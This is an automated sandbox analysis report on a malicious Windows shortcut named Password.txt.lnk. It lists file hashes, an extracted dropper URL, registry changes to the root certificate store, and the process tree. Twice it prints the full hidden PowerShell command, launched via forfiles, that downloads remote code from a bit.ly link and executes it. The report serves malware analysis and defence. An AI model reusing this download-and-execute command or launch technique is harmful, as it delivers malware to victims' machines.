Resubmissions
10-07-2020 14:55
200710-lvc7nhrjka 10Analysis
-
max time kernel
1290s -
max time network
1296s -
platform
windows7_x64 -
resource
win7 -
submitted
10-07-2020 14:55
Static task
static1
General
-
Target
Password.txt.lnk
-
Size
2KB
-
MD5
1904661a50ba45dda55fd32a286dc7b3
-
SHA1
d88c8c577002d4a36e7ff48844aa93e78f61191b
-
SHA256
a3fcd479bb42a6f147eb27bd105de1d05adcaaf7f71c0ae2f432a44b4e554ce5
-
SHA512
799530c6eea888523ee9f65ffea07746a3b1b68bf87c7ebea2e65bc09ad9f39de052e3dac4f8dbadcff79f16096510054360051c52724b828453ca08b28bad9f
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.ly/3eaY1TH
Signatures
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 1508 notepad.exe -
Processes:
powershell.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
cmd.exeforfiles.exepowershell.exedescription pid process target process PID 1492 wrote to memory of 784 1492 cmd.exe forfiles.exe PID 1492 wrote to memory of 784 1492 cmd.exe forfiles.exe PID 1492 wrote to memory of 784 1492 cmd.exe forfiles.exe PID 784 wrote to memory of 336 784 forfiles.exe powershell.exe PID 784 wrote to memory of 336 784 forfiles.exe powershell.exe PID 784 wrote to memory of 336 784 forfiles.exe powershell.exe PID 336 wrote to memory of 1508 336 powershell.exe notepad.exe PID 336 wrote to memory of 1508 336 powershell.exe notepad.exe PID 336 wrote to memory of 1508 336 powershell.exe notepad.exe PID 336 wrote to memory of 1700 336 powershell.exe UpdateWorker.exe PID 336 wrote to memory of 1700 336 powershell.exe UpdateWorker.exe PID 336 wrote to memory of 1700 336 powershell.exe UpdateWorker.exe PID 336 wrote to memory of 1700 336 powershell.exe UpdateWorker.exe PID 336 wrote to memory of 1700 336 powershell.exe UpdateWorker.exe PID 336 wrote to memory of 1700 336 powershell.exe UpdateWorker.exe PID 336 wrote to memory of 1700 336 powershell.exe UpdateWorker.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 336 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 336 powershell.exe 336 powershell.exe -
Blacklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 5 336 powershell.exe 7 336 powershell.exe 9 336 powershell.exe 10 336 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
UpdateWorker.exepid process 1700 UpdateWorker.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Password.txt.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows /m hh.exe /c "powershell -nop -exec bypass -w hidden -c $a=new-object net.webclient;$a.proxy.credentials=[system.net.credentialcache]::defaultnetworkcredentials;$a.downloadstring('http://bit.ly/3eaY1TH')|iex"2⤵
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-nop -exec bypass -w hidden -c $a=new-object net.webclient;$a.proxy.credentials=[system.net.credentialcache]::defaultnetworkcredentials;$a.downloadstring('http://bit.ly/3eaY1TH')|iex3⤵
- Modifies system certificate store
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:336 -
C:\Windows\system32\notepad.exe"C:\Windows\system32\notepad.exe" C:\Users\Admin\AppData\Local\Temp\Password.txt4⤵
- Opens file in notepad (likely ransom note)
PID:1508 -
C:\Users\Admin\AppData\Local\Temp\UpdateWorker.exe"C:\Users\Admin\AppData\Local\Temp\UpdateWorker.exe"4⤵
- Executes dropped EXE
PID:1700